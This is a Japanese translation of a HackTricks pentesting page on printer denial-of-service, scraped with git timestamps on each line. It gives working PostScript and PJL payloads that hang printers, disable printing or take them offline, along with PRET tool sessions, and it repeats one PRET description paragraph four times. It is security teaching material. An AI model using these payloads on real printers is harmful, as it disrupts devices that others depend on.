2022-04-28 16:01:33 +00:00
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ページの説明言語は、無限ループや多くの計算時間を必要とする計算を許可しています。[PCL](http://hacking-printers.net/wiki/index.php/PCL)のようなミニマリストな言語でも、利用可能なメモリが消費されるまで、永続的なマクロやフォントのアップロードに使用することができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 12:49:36 +00:00
|
|
|
|
# PostScript
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## 無限ループ
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
%!
|
|
|
|
|
{} loop
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)を使用すると、以下のようなことができます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- プリンターの状態を取得する(モデル、シリアル番号、トナーの残量など)
|
|
|
|
|
- プリンターの設定を変更する(デフォルトのパスワードの変更、ネットワーク設定の変更など)
|
|
|
|
|
- プリンターから印刷ジョブをキャプチャする
|
|
|
|
|
- プリンターのメモリをダンプする
|
|
|
|
|
- プリンターのファームウェアをアップロードする
|
|
|
|
|
- プリンターのファームウェアをリバースエンジニアリングする
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PRETは、プリンターの脆弱性を利用して、機密情報の漏洩やネットワークへの侵入を行うためのツールです。プリンターは通常、ネットワークに接続されており、セキュリティ対策が不十分な場合があります。PRETを使用することで、プリンターの脆弱性をテストし、セキュリティ上のリスクを特定することができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer ps
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> hang
|
|
|
|
|
Warning: This command causes an infinite loop rendering the
|
|
|
|
|
device useless until manual restart. Press CTRL+C to abort.
|
|
|
|
|
Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## `showpage` の再定義
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
`showpage` を何もしないように設定することで、実際にページを印刷するためにすべてのドキュメントで使用される `showpage` が何も印刷しないようになります。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
true 0 startjob
|
|
|
|
|
/showpage {} def
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)を使用すると、以下のようなことができます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- プリンターの状態を取得する(モデル、シリアル番号、トナーの残量など)
|
|
|
|
|
- プリンターの設定を変更する(デフォルトのパスワードの変更、ネットワーク設定の変更など)
|
|
|
|
|
- プリンターから印刷ジョブをキャプチャする
|
|
|
|
|
- プリンターのメモリをダンプする
|
|
|
|
|
- プリンターのファームウェアをアップロードする
|
|
|
|
|
- プリンターのファームウェアをリバースエンジニアリングする
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PRETは、プリンターの脆弱性を利用して、機密情報の漏洩やネットワークへの侵入を行うためのツールです。プリンターは通常、ネットワークに接続されており、セキュリティ対策が不十分な場合があります。PRETを使用することで、プリンターの脆弱性をテストし、セキュリティ上のリスクを特定することができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer ps
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> disable
|
|
|
|
|
Disabling printing functionality
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
両方の攻撃コードは、書き込み可能なディスクを持つデバイスに対して**永続的なDoS**を引き起こすために、Sys/Start、startup.psなどのファイルにも書き込むことができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 12:49:36 +00:00
|
|
|
|
# PJL
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 12:49:36 +00:00
|
|
|
|
## PJL jobmedia
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
プロプライエタリなPJLコマンドを使用すると、以下に示すように、LaserJet 4kシリーズなどの古いHPデバイスをサービスモードに設定し、すべての印刷機能を完全に無効にすることができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
@PJL SET SERVICEMODE=HPBOISEID
|
|
|
|
|
@PJL DEFAULT JOBMEDIA=OFF
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)を使用すると、以下のようなことができます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- プリンターの状態を取得する(モデル、シリアル番号、トナーの残量など)
|
|
|
|
|
- プリンターの設定を変更する(デフォルトのパスワードの変更、ネットワーク設定の変更など)
|
|
|
|
|
- プリンターから印刷ジョブをキャプチャする
|
|
|
|
|
- プリンターのメモリをダンプする
|
|
|
|
|
- プリンターのファームウェアをアップロードする
|
|
|
|
|
- プリンターのファームウェアをリバースエンジニアリングする
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PRETは、プリンターの脆弱性を利用して、機密情報の漏洩やネットワークへの侵入を行うためのツールです。プリンターは通常、ネットワークに接続されており、セキュリティ対策が不十分な場合があります。PRETを使用することで、プリンターの脆弱性をテストし、セキュリティ上のリスクを特定することができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer pjl
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> disable
|
|
|
|
|
Printing functionality: OFF
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## オフラインモード
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
さらに、PJL標準では、`OPMSG`コマンドが定義されており、これは「プリンタに指定されたメッセージを表示させ、オフラインにする」ためのものです\cite{hp1997pjl}。以下に示すように、これを使用して紙詰まりをシミュレートすることができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)を使用すると、以下のようなことができます:
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- プリンターの状態を取得する(モデル、シリアル番号、トナーの残量など)
|
|
|
|
|
- プリンターの設定を変更する(デフォルトのパスワードの変更、ネットワーク設定の変更など)
|
|
|
|
|
- プリンターから印刷ジョブをキャプチャする
|
|
|
|
|
- プリンターのメモリをダンプする
|
|
|
|
|
- プリンターのファームウェアをアップロードする
|
|
|
|
|
- プリンターのファームウェアをリバースエンジニアリングする
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
PRETは、プリンターの脆弱性を利用して、機密情報の漏洩やネットワークへの侵入を行うためのツールです。プリンターは通常、ネットワークに接続されており、セキュリティ対策が不十分な場合があります。PRETを使用することで、プリンターの脆弱性をテストし、セキュリティ上のリスクを特定することができます。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer pjl
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> offline "MESSAGE TO DSIPLAY"
|
|
|
|
|
Warning: Taking the printer offline will prevent yourself and others
|
|
|
|
|
from printing or re-connecting to the device. Press CTRL+C to abort.
|
|
|
|
|
Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**これらの攻撃について詳しくは**[**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing) **を参照してください**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝したいですか?** または、**PEASSの最新バージョンにアクセスしたいですか?** **またはHackTricksをPDFでダウンロードしたいですか?** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **を発見しましょう**、**独占的なNFTのコレクション**です[**NFTs**](https://opensea.io/collection/the-peass-family)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|